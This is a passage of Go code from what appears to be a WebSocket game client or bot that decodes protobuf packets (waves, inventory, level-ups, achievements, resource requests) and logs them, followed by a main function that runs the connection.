		case protobuf.PacketId_PACKET_ID_WAVE:
			wave := &protobuf.Wave{}
			err = proto.Unmarshal(packet.Value, wave)
			if err != nil {
				log.Println("Error unmarshaling wave:", err)
				continue
			}
			if len(mobs) == 0 {
				mobs = wave.Mobs
				waveEndMod(wave.Mobs)
			} else {
				waveEndMod(mobs)
			}
		case protobuf.PacketId_PACKET_ID_INVENTORY:
			inventory := &protobuf.SInventory{}
			err = proto.Unmarshal(packet.Value, inventory)
			if err != nil {
				log.Println("Error unmarshaling inventory:", err)
				continue
			}
			log.Println("Inventory:", inventory)
		case protobuf.PacketId_PACKET_ID_INVENTORY_EQUIP:
			inventoryEquip := &protobuf.SInventoryEquip{}
			err = proto.Unmarshal(packet.Value, inventoryEquip)
			if err != nil {
				log.Println("Error unmarshaling inventory equip:", err)
				continue
			}
			log.Println("Inventory Equip:", inventoryEquip)
		case protobuf.PacketId_PACKET_ID_LEVEL_UP:
			// Decoded only to validate the reply; nothing is logged on success
			levelUp := &protobuf.SLevelUp{}
			err = proto.Unmarshal(packet.Value, levelUp)
			if err != nil {
				log.Println("Error unmarshaling level up:", err)
				continue
			}
		case protobuf.PacketId_PACKET_ID_ACHIEVEMENT_UNLOCKED:
			achievementUnlocked := &protobuf.SAchievementUnlocked{}
			err = proto.Unmarshal(packet.Value, achievementUnlocked)
			if err != nil {
				log.Println("Error unmarshaling achievement unlocked:", err)
				continue
			}
			log.Println("Achievement unlocked:", achievementUnlocked.Name)
		case protobuf.PacketId_PACKET_ID_REQUEST_RESOURCE:
			// Logged even when decoding fails, so partial replies stay visible
			requestResource := &protobuf.SRequestResource{}
			err = proto.Unmarshal(packet.Value, requestResource)
			if err != nil {
				log.Println(err)
			}
			log.Println(requestResource)
		}
	}
}
// main runs the solver until the WebSocket connection ends.
//
// con is called directly rather than as `go con()` followed by `select {}`:
// once con returned, the empty select left no runnable goroutine and the
// runtime aborted with "all goroutines are asleep - deadlock!".
func main() {
	con()
}